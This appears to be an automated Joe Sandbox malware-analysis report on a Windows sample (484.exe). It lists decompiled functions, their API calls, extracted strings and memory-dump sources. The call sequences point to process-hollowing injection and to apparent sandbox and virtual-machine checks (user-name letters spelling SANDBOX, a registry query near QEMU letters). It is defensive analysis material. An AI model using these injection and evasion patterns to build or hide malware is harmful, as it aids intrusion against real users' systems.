Part of subcall function 0040890F: GetClipboardSequenceNumber.USER32 ref: 00408AF7
Part of subcall function 0040890F: wsprintfA.USER32 ref: 00408B2D
Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000000,?), ref: 00408B60
Part of subcall function 0040890F: HeapFree.KERNEL32(00000000), ref: 00408B67
Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B76
Part of subcall function 0040890F: HeapFree.KERNEL32(00000000), ref: 00408B79
Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000000,?), ref: 00408B84
Part of subcall function 0040890F: HeapFree.KERNEL32(00000000), ref: 00408B87
Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B90
Part of subcall function 0040890F: HeapFree.KERNEL32(00000000), ref: 00408B93
Part of subcall function 0040890F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B9F
Part of subcall function 0040890F: HeapFree.KERNEL32(00000000), ref: 00408BA2

Part of subcall function 0040EE9B: GetProcessHeap.KERNEL32(00000008,00000061,76AD46E9,7142434B,76E6FE8D), ref: 0040EF0F
Part of subcall function 0040EE9B: HeapAlloc.KERNEL32(00000000), ref: 0040EF12
Part of subcall function 0040EE9B: GetForegroundWindow.USER32 ref: 0040EF23
Part of subcall function 0040EE9B: OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 0040EF58
Part of subcall function 0040EE9B: CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0040EF6B
Part of subcall function 0040EE9B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040EF73
Part of subcall function 0040EE9B: HeapFree.KERNEL32(00000000), ref: 0040EF76
Part of subcall function 0040EE9B: ExitProcess.KERNEL32 ref: 0040EF84

CreateThread.KERNEL32(00000000,00000000,0040C737,00000000,00000000,00000000), ref: 0040F47A
CloseHandle.KERNEL32(00000000), ref: 0040F481
GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0040F48A
HeapFree.KERNEL32(00000000), ref: 0040F493
GetProcessHeap.KERNEL32(00000000,00000005), ref: 0040F49A

Strings

i8C), xrefs: 0040F351
4$NU, xrefs: 0040F150
N0q, xrefs: 0040F149
q;K,, xrefs: 0040F335
3d'N, xrefs: 0040F23A
Uqu4AN, xrefs: 0040F191
6N%J, xrefs: 0040F233
7, xrefs: 0040F079
i.C/, xrefs: 0040F32E
d, xrefs: 0040F25F
Hiyn5, xrefs: 0040F03A
Bq, xrefs: 0040F35F
!J6d, xrefs: 0040F241
KCBqiNhR7x, xrefs: 0040F3A3
J+df, xrefs: 0040F2B9
CN)J, xrefs: 0040F248
45N&, xrefs: 0040F13B
N, xrefs: 0040F2C0
PJ6d, xrefs: 0040F22C
y{[W, xrefs: 0040EFED
JWd#, xrefs: 0040F296
N, xrefs: 0040F265
i, xrefs: 0040F365
Cgq5, xrefs: 0040F343

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 001702B2, Relevance: 61.4, APIs: 18, Strings: 17, Instructions: 134

APIs

RtlExitUserThread.NTDLL(00000000), ref: 001701D1
GetProcAddress.KERNEL32(?,LoadLibraryA,00000000), ref: 001702D6
LoadLibraryA.KERNEL32(advapi32.dll), ref: 001702E9
LoadLibraryA.KERNEL32(user32.dll), ref: 00170301
GetProcAddress.KERNEL32(?,VirtualAlloc), ref: 0017031C
GetProcAddress.KERNEL32(?,VirtualProtect), ref: 0017033A
GetProcAddress.KERNEL32(?,VirtualFree), ref: 00170358
GetProcAddress.KERNEL32(?,ExitThread), ref: 00170376
GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00170394
GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 001703B2
GetProcAddress.KERNEL32(?,RegCloseKey), ref: 001703D0
GetProcAddress.KERNEL32(?,GetSystemWindowsDirectoryA), ref: 001703EE
GetProcAddress.KERNEL32(?,GetVolumeInformationA), ref: 0017040C
GetProcAddress.KERNEL32(?,GetUserNameA), ref: 0017042A
GetProcAddress.KERNEL32(?,CharUpperBuffA), ref: 00170448
GetProcAddress.KERNEL32(?,GetModuleHandleExW), ref: 00170466
GetProcAddress.KERNEL32(?,ExitProcess), ref: 00170484
GetProcAddress.KERNEL32(?,TerminateProcess), ref: 001704A2

Strings

RegQueryValueExA, xrefs: 001703AE
GetUserNameA, xrefs: 00170426
GetVolumeInformationA, xrefs: 00170408
RegOpenKeyExA, xrefs: 00170390
GetModuleHandleExW, xrefs: 00170462
CharUpperBuffA, xrefs: 00170444
VirtualAlloc, xrefs: 00170318
LoadLibraryA, xrefs: 001702D2
ExitThread, xrefs: 00170372
RegCloseKey, xrefs: 001703CC
user32.dll, xrefs: 00170300
advapi32.dll, xrefs: 001702E8
GetSystemWindowsDirectoryA, xrefs: 001703EA
VirtualFree, xrefs: 00170354
VirtualProtect, xrefs: 00170336
TerminateProcess, xrefs: 0017049E
ExitProcess, xrefs: 00170480

Memory Dump Source

Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_170000_484.jbxd

Function 0040F6F4, Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 120

APIs

GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0040F74E
HeapAlloc.KERNEL32(00000000), ref: 0040F751
GetClipboardSequenceNumber.USER32 ref: 0040F766
GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F7B8
HeapAlloc.KERNEL32(00000000), ref: 0040F7BB
GetShellWindow.USER32 ref: 0040F7CF
GetModuleHandleA.KERNEL32(00000000,?), ref: 0040F800
GetProcAddress.KERNEL32(00000000), ref: 0040F807
NtMapViewOfSection.NTDLL(?,?,4B475735,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 0040F827

Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0040F4DE
Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F4E1
Part of subcall function 0040F4A9: GetShellWindow.USER32 ref: 0040F4FD
Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0040F55D
Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F560
Part of subcall function 0040F4A9: GetInputState.USER32 ref: 0040F574
Part of subcall function 0040F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040F59E
Part of subcall function 0040F4A9: GetProcAddress.KERNEL32(00000000), ref: 0040F5A5
Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F5B5
Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5C2
Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F5C7
Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5CE

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F835
HeapFree.KERNEL32(00000000), ref: 0040F842
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F847
HeapFree.KERNEL32(00000000), ref: 0040F84E

Strings

DvIhPJ, xrefs: 0040F783
m, xrefs: 0040F76C
[##', xrefs: 0040F799
5WGK, xrefs: 0040F7AD
?$, xrefs: 0040F737
D, xrefs: 0040F73D
5, xrefs: 0040F7B4

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040F995, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 170

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F9F1
HeapAlloc.KERNEL32(00000000), ref: 0040F9F4
GetShellWindow.USER32 ref: 0040FA08
GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040FA67
HeapAlloc.KERNEL32(00000000), ref: 0040FA6A
GetCapture.USER32 ref: 0040FA7E
GetModuleHandleA.KERNEL32(?,00000000), ref: 0040FAAF
GetProcAddress.KERNEL32(00000000), ref: 0040FAB6
NtCreateSection.NTDLL(00000000,000F001F,00000018,?,00000040,08000000,00000000), ref: 0040FAEF
HeapFree.KERNEL32(00000000), ref: 0040FB6C

Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0040F74E
Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F751
Part of subcall function 0040F6F4: GetClipboardSequenceNumber.USER32 ref: 0040F766
Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F7B8
Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F7BB
Part of subcall function 0040F6F4: GetShellWindow.USER32 ref: 0040F7CF
Part of subcall function 0040F6F4: GetModuleHandleA.KERNEL32(00000000,?), ref: 0040F800
Part of subcall function 0040F6F4: GetProcAddress.KERNEL32(00000000), ref: 0040F807
Part of subcall function 0040F6F4: NtMapViewOfSection.NTDLL(?,?,4B475735,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 0040F827
Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F835
Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F842
Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F847
Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F84E

Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0040F4DE
Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F4E1
Part of subcall function 0040F4A9: GetShellWindow.USER32 ref: 0040F4FD
Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0040F55D
Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F560
Part of subcall function 0040F4A9: GetInputState.USER32 ref: 0040F574
Part of subcall function 0040F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040F59E
Part of subcall function 0040F4A9: GetProcAddress.KERNEL32(00000000), ref: 0040F5A5
Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F5B5
Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5C2
Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F5C7
Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5CE

CloseHandle.KERNEL32(00000000), ref: 0040FB4A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FB59
HeapFree.KERNEL32(00000000), ref: 0040FB62
GetProcessHeap.KERNEL32(00000000,?), ref: 0040FB69

Strings

'@, xrefs: 0040FA3E
'5, xrefs: 0040F9E0
5WGK5, xrefs: 0040FA25
[##', xrefs: 0040F9BB

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00409C2E, Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 355

APIs

GetProcessHeap.KERNEL32(00000008,00000208,?,00000000,76E6FE8D), ref: 00409C4C
HeapAlloc.KERNEL32(00000000), ref: 00409C59
GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D22
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D29
GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D43
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409D74
lstrcatW.KERNEL32(?,?), ref: 00409D85
lstrcatW.KERNEL32(?,00410518), ref: 00409D8D
lstrcatW.KERNEL32(?,?), ref: 00409D93
lstrcatW.KERNEL32(?,00410520), ref: 00409D9B
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409DAA
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00409DCB
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00409DD4
HeapFree.KERNEL32(00000000), ref: 00409DDB
GetThreadContext.KERNEL32(?,00010002), ref: 00409E05
HeapFree.KERNEL32(00000000), ref: 0040A0DD

Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F9F1
Part of subcall function 0040F995: HeapAlloc.KERNEL32(00000000), ref: 0040F9F4
Part of subcall function 0040F995: GetShellWindow.USER32 ref: 0040FA08
Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040FA67
Part of subcall function 0040F995: HeapAlloc.KERNEL32(00000000), ref: 0040FA6A
Part of subcall function 0040F995: GetCapture.USER32 ref: 0040FA7E
Part of subcall function 0040F995: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040FAAF
Part of subcall function 0040F995: GetProcAddress.KERNEL32(00000000), ref: 0040FAB6
Part of subcall function 0040F995: NtCreateSection.NTDLL(00000000,000F001F,00000018,?,00000040,08000000,00000000), ref: 0040FAEF
Part of subcall function 0040F995: CloseHandle.KERNEL32(00000000), ref: 0040FB4A
Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FB59
Part of subcall function 0040F995: HeapFree.KERNEL32(00000000), ref: 0040FB62
Part of subcall function 0040F995: GetProcessHeap.KERNEL32(00000000,?), ref: 0040FB69
Part of subcall function 0040F995: HeapFree.KERNEL32(00000000), ref: 0040FB6C

SetLastError.KERNEL32(00000000), ref: 00409FC9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00409FF4
IsBadReadPtr.KERNEL32(EpiTo,00000001), ref: 0040A01C
IsBadReadPtr.KERNEL32(?,00000004), ref: 0040A038
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 0040A068
ResumeThread.KERNELBASE(?), ref: 0040A07E
CloseHandle.KERNEL32(00000000), ref: 0040A0A2

Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F888
Part of subcall function 0040F859: HeapAlloc.KERNEL32(00000000), ref: 0040F88F
Part of subcall function 0040F859: GetShellWindow.USER32 ref: 0040F8A1
Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000008,00000016), ref: 0040F905
Part of subcall function 0040F859: HeapAlloc.KERNEL32(00000000), ref: 0040F90C
Part of subcall function 0040F859: CloseClipboard.USER32 ref: 0040F920
Part of subcall function 0040F859: LoadLibraryA.KERNEL32(?), ref: 0040F951
Part of subcall function 0040F859: GetProcAddress.KERNEL32(00000000), ref: 0040F958
Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F971
Part of subcall function 0040F859: HeapFree.KERNEL32(00000000), ref: 0040F97E
Part of subcall function 0040F859: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F983
Part of subcall function 0040F859: HeapFree.KERNEL32(00000000), ref: 0040F98A

Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,00000000), ref: 0040F74E
Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F751
Part of subcall function 0040F6F4: GetClipboardSequenceNumber.USER32 ref: 0040F766
Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F7B8
Part of subcall function 0040F6F4: HeapAlloc.KERNEL32(00000000), ref: 0040F7BB
Part of subcall function 0040F6F4: GetShellWindow.USER32 ref: 0040F7CF
Part of subcall function 0040F6F4: GetModuleHandleA.KERNEL32(00000000,?), ref: 0040F800
Part of subcall function 0040F6F4: GetProcAddress.KERNEL32(00000000), ref: 0040F807
Part of subcall function 0040F6F4: NtMapViewOfSection.NTDLL(?,?,4B475735,00000000,00000000,?,00000000,00000002,00000000,00000040), ref: 0040F827
Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F835
Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F842
Part of subcall function 0040F6F4: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F847
Part of subcall function 0040F6F4: HeapFree.KERNEL32(00000000), ref: 0040F84E

TerminateProcess.KERNEL32(?,00000000), ref: 0040A0B5
CloseHandle.KERNEL32(?), ref: 0040A0BF
CloseHandle.KERNEL32(?), ref: 0040A0C9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A0D6

Strings

piTo, xrefs: 0040A01E
Ep, xrefs: 00409D0E
EpiTo, xrefs: 0040A017, 0040A01B
o p, xrefs: 00409CF6

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0041E1E0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 154

APIs

GetVersionExA.KERNEL32(?), ref: 0041E26D
GetCurrentThread.KERNEL32 ref: 0041E273
Sleep.KERNELBASE(00007918), ref: 0041E2B3
GetVersionExA.KERNEL32(?), ref: 0041E34E

Part of subcall function 0041E070: GetEnvironmentStrings.KERNEL32 ref: 0041E0B5

GetCurrentThread.KERNEL32 ref: 0041E41F
GetCurrentThread.KERNEL32 ref: 0041E425

Part of subcall function 0041DDE0: VirtualAlloc.KERNELBASE(00000000,000009E2,00003000,00000001), ref: 0041DE24

Strings

q, xrefs: 0041E2EE
i%, xrefs: 0041E235
>, xrefs: 0041E23E
STATUS_ACPI_NOT_INITIALIZED, xrefs: 0041E369

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0017075A, Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 40

APIs

GetUserNameA.ADVAPI32(?,00000400), ref: 0017077C
CharUpperBuffA.USER32(?,00000400), ref: 00170790

Strings

O, xrefs: 001707C3
X, xrefs: 001707CC
B, xrefs: 001707BA
N, xrefs: 001707A8
S, xrefs: 00170796
A, xrefs: 0017079F
D, xrefs: 001707B1

Memory Dump Source

Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_170000_484.jbxd

Function 0041E4F0, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 170

APIs

LoadLibraryA.KERNEL32(winscard.dll), ref: 0041E665
GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 0041E6BA

Strings

winscard.dll, xrefs: 0041E660
S, xrefs: 0041E5E9
SCardDisconnect, xrefs: 0041E6B1
r, xrefs: 0041E599
B, xrefs: 0041E5F0

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00170010, Relevance: 12.2, APIs: 8, Instructions: 155

APIs

Part of subcall function 001702B2: RtlExitUserThread.NTDLL(00000000), ref: 001701D1
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,LoadLibraryA,00000000), ref: 001702D6
Part of subcall function 001702B2: LoadLibraryA.KERNEL32(advapi32.dll), ref: 001702E9
Part of subcall function 001702B2: LoadLibraryA.KERNEL32(user32.dll), ref: 00170301
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,VirtualAlloc), ref: 0017031C
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,VirtualProtect), ref: 0017033A
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,VirtualFree), ref: 00170358
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,ExitThread), ref: 00170376
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00170394
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 001703B2
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 001703D0
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,GetSystemWindowsDirectoryA), ref: 001703EE
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,GetVolumeInformationA), ref: 0017040C
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,GetUserNameA), ref: 0017042A
Part of subcall function 001702B2: GetProcAddress.KERNEL32(?,CharUpperBuffA), ref: 00170448

GetModuleHandleExW.KERNEL32(00000004,?,?), ref: 0017002D
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0017005B
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 001700B2
VirtualFree.KERNEL32(?,00000000,00008000,?,?), ref: 001700D8
VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001700FE
VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,00000000,?), ref: 00170139
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?), ref: 0017017D

Part of subcall function 0017020E: LoadLibraryA.KERNEL32(?), ref: 0017022E
Part of subcall function 0017020E: GetProcAddress.KERNEL32(?,?), ref: 00170269

Memory Dump Source

Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_170000_484.jbxd

Function 0041F241, Relevance: 12.1, APIs: 8, Instructions: 98

APIs

GetStartupInfoW.KERNEL32(?,00435720,00000058), ref: 0041F251
HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 0041F266

Part of subcall function 00421738: HeapCreate.KERNELBASE(00000000,00001000,00000000,0041F2BA), ref: 00421741

Part of subcall function 004215BD: GetModuleHandleW.KERNEL32(00434124,?,0041F2CB), ref: 004215C5
Part of subcall function 004215BD: TlsAlloc.KERNEL32(?,0041F2CB), ref: 0042165E
Part of subcall function 004215BD: GetCurrentThreadId.KERNEL32(?,0041F2CB), ref: 0042171D

__RTC_Initialize.LIBCMT ref: 0041F2D7

Part of subcall function 00420F29: GetStartupInfoW.KERNEL32(?), ref: 00420F36
Part of subcall function 00420F29: GetFileType.KERNEL32(?), ref: 00421069
Part of subcall function 00420F29: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042109F
Part of subcall function 00420F29: GetStdHandle.KERNEL32(-000000F6), ref: 004210F3
Part of subcall function 00420F29: GetFileType.KERNEL32(00000000), ref: 00421105
Part of subcall function 00420F29: InitializeCriticalSectionAndSpinCount.KERNEL32(-004367F4,00000FA0), ref: 00421133
Part of subcall function 00420F29: SetHandleCount.KERNEL32 ref: 0042115C

__amsg_exit.LIBCMT ref: 0041F2EA
GetCommandLineW.KERNEL32 ref: 0041F2F0

Part of subcall function 00420ED1: GetEnvironmentStringsW.KERNEL32(00000000,0041F300), ref: 00420ED4
Part of subcall function 00420ED1: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00420F10

Part of subcall function 00420E23: GetModuleFileNameW.KERNEL32(00000000,C:\Users\LUKETA~1\AppData\Local\Temp\484.exe,00000104), ref: 00420E43
Part of subcall function 00420E23: _wparse_cmdline.LIBCMT ref: 00420E6D
Part of subcall function 00420E23: _wparse_cmdline.LIBCMT ref: 00420EAF

__amsg_exit.LIBCMT ref: 0041F310

Part of subcall function 00420BE2: _wcslen.LIBCMT ref: 00420C02
Part of subcall function 00420BE2: _wcslen.LIBCMT ref: 00420C3A

__amsg_exit.LIBCMT ref: 0041F321

Part of subcall function 004205BF: __initterm_e.LIBCMT ref: 004205F5

__amsg_exit.LIBCMT ref: 0041F334

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00420F29, Relevance: 10.7, APIs: 7, Instructions: 196

APIs

GetStartupInfoW.KERNEL32(?), ref: 00420F36

Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD

GetFileType.KERNEL32(?), ref: 00421069
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042109F
GetStdHandle.KERNEL32(-000000F6), ref: 004210F3
GetFileType.KERNEL32(00000000), ref: 00421105
InitializeCriticalSectionAndSpinCount.KERNEL32(-004367F4,00000FA0), ref: 00421133
SetHandleCount.KERNEL32 ref: 0042115C

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00420F29, Relevance: 10.7, APIs: 7, Instructions: 196

APIs

GetStartupInfoW.KERNEL32(?), ref: 00420F36

Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD

GetFileType.KERNEL32(?), ref: 00421069
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042109F
GetStdHandle.KERNEL32(-000000F6), ref: 004210F3
GetFileType.KERNEL32(00000000), ref: 00421105
InitializeCriticalSectionAndSpinCount.KERNEL32(-004367F4,00000FA0), ref: 00421133
SetHandleCount.KERNEL32 ref: 0042115C

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 001706A0, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 23

APIs

RegQueryValueExA.KERNEL32(00000000,0017068E,00000000,00000007,?,00000400,?,?,00170000), ref: 001706A6
RegCloseKey.ADVAPI32(00000000,?,?,00170000), ref: 001706E7

Strings

E, xrefs: 001706B9
Q, xrefs: 001706B0
U, xrefs: 001706CB
M, xrefs: 001706C2

Memory Dump Source

Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_170000_484.jbxd

Function 0041DDE0, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 185

APIs

VirtualAlloc.KERNELBASE(00000000,000009E2,00003000,00000001), ref: 0041DE24

Part of subcall function 0041DDA0: GetVersionExA.KERNEL32(?), ref: 0041DDB0

Part of subcall function 0041DD60: GetVersionExA.KERNEL32(?), ref: 0041DD70

Strings

L, xrefs: 0041DDFB
STATUS_NAME_TOO_LONG, xrefs: 0041DE44
P, xrefs: 0041DF43
SM_LOOK4RINGON, reached m_OnDuration , xrefs: 0041DE5F

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0041E8F0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128

APIs

SHDeleteValueW.SHLWAPI(00000000,00000000,00000000), ref: 0041E938

Part of subcall function 0041E4F0: LoadLibraryA.KERNEL32(winscard.dll), ref: 0041E665
Part of subcall function 0041E4F0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 0041E6BA

Part of subcall function 0041E460: GetCurrentThread.KERNEL32 ref: 0041E492

Part of subcall function 0041E1E0: GetVersionExA.KERNEL32(?), ref: 0041E26D
Part of subcall function 0041E1E0: GetCurrentThread.KERNEL32 ref: 0041E273
Part of subcall function 0041E1E0: Sleep.KERNELBASE(00007918), ref: 0041E2B3
Part of subcall function 0041E1E0: GetVersionExA.KERNEL32(?), ref: 0041E34E
